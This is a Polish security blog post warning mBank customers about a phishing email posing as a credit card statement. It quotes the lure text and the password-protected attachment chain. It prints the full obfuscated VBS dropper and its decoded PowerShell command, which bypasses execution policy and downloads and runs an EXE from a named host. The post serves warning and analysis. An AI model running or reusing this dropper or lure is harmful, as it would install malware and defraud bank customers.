Uwaga klienci mBanku – ktoś wysyła fałszywe wyciągi z karty kredytowej

dodał 11 kwietnia 2017 o 07:21 w kategorii Złośniki  z tagami:
Uwaga klienci mBanku – ktoś wysyła fałszywe wyciągi z karty kredytowej

Klienci polskich banków – i same banki – nie mają ostatnio łatwego życia. W sieci nie brakuje kolejnych prób ataków i wyłudzeń. Kolejna pułapka właśnie została przez przestępców zastawiona na klientów mBanku.

Do jednego z naszych Czytelników dotarła dość unikatowa próbka. Dostaliśmy tylko jeden egzemplarz, a złośliwego oprogramowania jeszcze chwilę temu nie było w serwisie VirusTotal. My przyjrzyjmy się atakowi, a Wy ostrzeżcie znajomych którzy mają w mBanku konta.

Email prawie jak normalny

Złośliwa wiadomość wygląda identycznie jak zwyczajowy wyciąg z operacji na karcie przesyłany przez mBank. Tytuł to „mBank – Elektroniczne zestawienie operacji na karcie kredytowej” zaś w treści znajdziemy:

Witamy,
dziękujemy za korzystanie z usług mBanku. W załączniku przesyłamy wyciąg okresowy z rachunku karty kredytowej.

Jeśli masz aktywną usługę wysyłki szyfrowanych wyciągów, w celu otwarcia załączonego dokumentu wpisz aktualne hasło do szyfrowania wyciągów, które ustaliłeś w serwisie transakcyjnym.
Więcej informacji na temat szyfrowania wyciągów znajdziesz na stronie mBanku.

Pozdrawiamy,
Zespół mBanku

O ile treść wiadomości jest dość niewinna, to już gorzej z załącznikiem. Jest to plik o nazwie

Elektroniczne Zestawienie Opreacji - VISA CLASSIC nr 45.zip

w którym spakowany jest folder o nazwie

Elektroniczne Zestawienie Opreacji - VISA CLASSIC nr 45

w którym znajdują się dwa pliki:

Elektroniczne Zestawienie Opreacji - VISA CLASSIC nr 45.rar
Haslo do elektonicznego zestawienia operacji.txt

Zawartość pliku TXT to

Haslo: dzc560UF

Tym hasłem zabezpieczony jest plik RAR. Po jego rozpakowaniu możemy znaleźć folder

Elektroniczne Zestawienie Opreacji - VISA CLASSIC nr 45

a w nim plik

Elektroniczne Zestawienie Opreacji - VISA CLASSIC nr 45.vbs

Identyczny łańcuch plików i folderów obserwowaliśmy ostatnio w kampanii pt. „faktury Netii”.

Zawartość pliku VBS to:

FuNcTiON ApjUZKGUtRJ ( ByvAL NgxJaWLjWhu ) : DiM gSCWNeIzLDs , EcSRVfWncMf : seT gSCWNeIzLDs = cREatEObjecT ( "mSXml2.doMDoCUMEnt.3.0" ) : sEt EcSRVfWncMf = gSCWNeIzLDs.CREaTEelEmENt ( "BaSe64" ) : EcSRVfWncMf.DatatYpe = "bin.BASE64" : EcSRVfWncMf.TExT = NgxJaWLjWhu : ApjUZKGUtRJ = OIjaHVlYUYS ( EcSRVfWncMf.NodeTYpedvAluE ) : Set EcSRVfWncMf = nothIng : sET gSCWNeIzLDs = NoThIng : enD fUNCTIon : FUNcTion OIjaHVlYUYS ( KIlagzPshJL ) : DIM pKaXiukQEuT : SEt pKaXiukQEuT = CreAteOBjEct ( "AdOdb.strEam" ) : pKaXiukQEuT.type = 1 : pKaXiukQEuT.OPen : pKaXiukQEuT.wRITe KIlagzPshJL : pKaXiukQEuT.pOSitIon = 0 : pKaXiukQEuT.tYpe = 2 : pKaXiukQEuT.CHaRSEt = "US-AsCii" : OIjaHVlYUYS = pKaXiukQEuT.reaDTEXT : Set pKaXiukQEuT = Nothing : eND fUncTiOn : dIm NgxJaWLjWhu : DIM gSCWNeIzLDs : SEt NgxJaWLjWhu = CReATEobjECT ( ApjUZKGUtRJ("V3NDcmlQdC5TSGVsbA==") ) : gSCWNeIzLDs = " PowERSHelL.eXe -ExeCUtiOnPOLicY bYPAsS  -windowSTyle HIdDEn -EnCoDedcOMmAND IABQAG8AdwBFAFIAUwBIAGUAbABMAC4AZQBYAGUAIAAtAEUAeABlAEMAVQB0AGkATwBuAFAATwBMAGkAYwBZACAAYgBZAFAAQQBzAFMAIAAgAC0AdwBpAG4AZABvAHcAUwBUAHkAbABlACAASABJAGQARABFAG4AIABpAG4AVgBPAGsARQAtAHcAZQBiAFIAZQBxAHUAZQBTAHQAIAAtAFUAcgBJACAAHSBoAHQAdABwADoALwAvAGsAdwBpAGUAYwBpAGUAbgAyADAAMQA3AC4AcABkAG4AcwAuAGMAegAvAGEAcABpAC8AcgA1ADUAeABrAHcALgBlAHgAZQAdICAALQBvAHUAdABGAGkAbABlACAAHSAkAGUAbgBWADoAdABFAE0AcABcAHMAdABlAHIAbwB3AG4AaQBrAGkAQQBVAFgALgBlAHgAZQAdICAAOwAgAGkAbgBWAG8ASwBFAC0AaQBUAEUAbQAgAB0gJABFAE4AdgA6AFQAZQBtAFAAXABzAHQAZQByAG8AdwBuAGkAawBpAEEAVQBYAC4AZQB4AGUAHSA= " : NgxJaWLjWhu.Run chr ( 34 ) & NgxJaWLjWhu.eXpANdEnVironmENtsTrInGS( ApjUZKGUtRJ("JWNvTVNQRWMl") ) & ChR ( 34 ) & CHr ( 34 ) & ApjUZKGUtRJ("L2Mg") & gSCWNeIzLDs & chR ( 34 ) , 0 : SeT NgxJaWLjWhu = NotHInG

Gdy weźmiemy część zakodowaną w base64 i zdekodujemy, otrzymamy:

 PowERSHelL.eXe -ExeCUtiOnPOLicY bYPAsS  -windowSTyle HIdDEn inVOkE-webRequeSt -UrI  http://kwiecien2017.pdns.cz/api/r55xkw.exe  -outFile  $enV:tEMp\sterownikiAUX.exe  ; inVoKE-iTEm  $ENv:TemP\sterownikiAUX.exe

Czyli kod VBS pobiera i uruchamia plik

http://kwiecien2017.pdns.cz/api/r55xkw.exe

Plik EXE wrzuciliśmy na VT i okazało się, że byliśmy pierwsi. Znaleźliśmy jedynie ślady pliku VBS wrzucanego kilka godzin wcześniej. To znaczy, że kampania ma najprawdopodobniej ograniczony zasięg. Analizę pliku EXE opublikujemy jak tylko zespół Anonimowych Analityków się obudzi.